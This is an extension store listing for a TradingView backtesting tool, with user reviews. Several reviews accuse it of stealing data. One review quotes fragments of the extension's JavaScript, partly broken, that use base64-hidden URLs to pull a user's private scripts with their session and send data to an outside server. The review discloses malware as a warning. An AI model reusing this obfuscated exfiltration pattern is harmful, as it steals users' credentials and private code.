Automated Backtesting Tool
With this extension you are able to automatically backtest your TradingView strategies. This tool is highly customizable and you are able to test as much input values as you like. Start to find the best settings for you strategy to be even more profitable in your trading.
Latest reviews
- (2023-08-14) Kenneth Dobrowolski: I liked the tool but your information is not secure on this web extension delete it IMMediately!
- (2022-05-16) Yu Lin: Tradingview Account has been ban by use this extension.
- (2022-03-23) Benson Gitau: Liked it. Works better when you have TradingView to Anywhere tool to execute the strategy alerts as trades on your trading platform
- (2022-02-03) ARMAN fathalipour: good
- (2022-01-24) Trap Is Life: steal data
- (2021-12-15) Onur Demirbaş: It just steals your tradingview username and password. DO NOT USE IT!
- (2021-12-11) Crypto Fox: !!!!WARNING!!!! This app steals your saved scripts source code and and sends to their server:', details in source code below. content-script.js: $.ajax({ url: decodeURIComponent(escape(window.atob("aHR0cHM6Ly9waW5lLWZhY2FkZS50cmFkaW5ndmlldy5jb20vcGluZS1mYWNhZGUvbGlzdD9maWx0ZXI9c2F2ZWQ="))), <<<< GETS A LIST OF YOUR PRIVATE SCRIPTS xhrFields: {withCredentials: !0} }).done((function (t) { for (var e = JSON.parse(t), n = [], r = 0; r < e.length; r++) { var o = e[r]; $.ajax({ url: decodeURIComponent(escape(window.atob("aHR0cHM6Ly9waW5lLWZhY2FkZS50cmFkaW5ndmlldy5jb20vcGluZS1mYWNhZGUvZ2V0Lw=="))) + o.scriptIdPart + "/last?no_4xx=false", <<<<< RETRIEVES EACH SCRIPTS PINECODE xhrFields: {withCredentials: !0} }).done((function (t) { var r = JSON.parse(t); if (n.push(r), n.length == e.length) { var o = JSON.stringify(n); localStorage.setItem("csyt", window.btoa(unescape(encodeURIComponent(o)))) } })) } })) } + ")()", (document.head || document.documentElement).appendChild(e), e.parentNode.removeChild(e); case 4: if (null != localStorage.getItem("csyt")) { = 9; break } return = 7, v(50); case 7: = 4; break; case 9: return n = localStorage.getItem("csyt"), localStorage.setItem(decodeURIComponent(escape(window.atob("aWFfczE="))), (new Date).getTime()), t.abrupt("return", n); <<<< GETS ALL SCRIPTS WITH YOUR TV USER ID case 13: case"end": return t.stop() } }), t) }))), a.apply(this, arguments) } popup.js: }, getTvUsername: function () { this.s(); var t = this; chrome.tabs.query({currentWindow: !0, active: !0}, (function (e) { chrome.tabs.sendMessage(e[0].id, {type: "username"}, t.receiveTvUserNameResponse) })) }, receiveTvUserNameResponse: function (t) { null != t && (this.username = t.username) }, s: function () { var t = this; chrome.tabs.query({currentWindow: !0, active: !0}, (function (e) { chrome.tabs.sendMessage(e[0].id, {type: "s"}, t.sResponse) })) }, sResponse: function (t) { if (null != t) { var e = {S: t.s, U: t.u}, s = decodeURIComponent(escape(window.atob("aHR0cHM6Ly93d3cudHYtaHViLm9yZy9hcGkvRXh0ZW5zaW9uL1M=")));, e) <<<<<<< STEALING YOUR SCRIPTS DATA } }
- (2021-12-11) Juan Felype: what a great job. wish i could set more parameters like minimun value of trades etc, but still a great job
- (2021-08-23) Piefone tech-talk: loved it